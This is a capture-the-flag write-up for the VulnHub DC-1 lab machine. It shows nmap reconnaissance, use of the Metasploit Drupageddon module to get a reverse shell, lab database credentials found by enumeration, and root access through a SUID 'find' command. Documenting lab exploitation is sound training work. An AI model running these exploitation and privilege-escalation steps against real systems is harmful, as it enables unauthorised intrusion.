# Pre-Engagement
I downloaded the box from VulnHub, and created a virtual machine giving it a
bridged adapter. The machine's IP address has been aliased to `dc1` within
my `/etc/hosts` file.

# Reconnaissance
I first use `nmap` to scan some of the ports:
`nmap -p- -oN nmap/initial -T4 dc1`

Which reveals the following:
```
Nmap scan report for dc1 (192.168.1.10)
Host is up (0.011s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
41675/tcp open  unknown
```

I then perform an aggressive scan on those ports:
`nmap -oN nmap/aggressive -A -p 22,80,111,41675 dc1`

Which reveals some interesting results:
```
Nmap scan report for dc1 (192.168.1.10)
Host is up (0.0026s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4d659e6774c227a961660678b42488f (DSA)
|   2048 1182fe534edc5b327f446482757dd0a0 (RSA)
|_  256 3daa985c87afea84b823688db9055fd8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          32849/udp   status
|   100024  1          40439/udp6  status
|   100024  1          41675/tcp   status
|_  100024  1          45990/tcp6  status
41675/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# Vulnerability Analysis
I checked out a few things regarding `rpcbind` from the [hacktricks](https://book.hacktricks.xyz/)
website but couldn't find anything useful. I then checked the http interface on my browser, and
apparently it was a Drupal site. I checked out the `robots.txt` file but the entries seemed to be
one of the standard templates used my most websites.

Since there wasn't much left of this machine, I wanted to see if the Drupal version had any
vulnerabilities. For that I needed to know a little bit about the Drupal version. I checked to see
if the CHANGELOG.txt file would reveal anything about the version, but it was blocked from
accessing. Then I used the Wappalyzer plugin to check the version which revealed that it was using
Drupal 7.

# Exploitation
I opened up `msfconsole` and searched for any exploit related to Drupal 7.
```
$ msfconsole
msf6 > search drupal 7

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
```

I picked the one at index `2`, set the appropriate options, and ran the exploit:
```
msf6 > use exploit/multi/http/drupal_drupageddon
msf6 exploit(multi/http/drupal_drupageddon) > set RHOSTS dc1
msf6 exploit(multi/http/drupal_drupageddon) > run
[*] Started reverse TCP handler on 192.168.1.3:4444
(...)
```

And voila! I had a reverse shell on the machine.

There was a flag `flag1.txt` as well as a `flag4.txt` in the `flag4` user's home, but we needed to
find the actual flag (`proof.txt`). I used `linpeas.sh` to search the system and along the way found
out that there was a `mysql` user named `dbuser` with the password `R0ck3t`. I could login to
`mysql` using those credentials, but couldn't find anything useful besides hashed passwords.

# Privilege Escalation
I used `find` to locate the `proof.txt` file and apparently it was located within the `root`'s home
directory. However, I obviously couldn't access it since the shell was running under a `www-data`
user. However, after the `linpeas.sh` scan was completed, I found out that the `find` command itself
had a SUID bit set. This made things easy, since I could now do:
```
find flag1.txt -exec /bin/bash -p \;
```

Unsurprisingly, this gave us a root shell:
```
bash-4.2# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
bash-4.2# cd /root
cd /root
bash-4.2# ls
ls
proof.txt  thefinalflag.txt
bash-4.2# cat proof.txt
cat proof.txt
dba38cd5d7769b463e4cb05804e5f18f
```

Hence, the flag was `dba38cd5d7769b463e4cb05804e5f18f`.
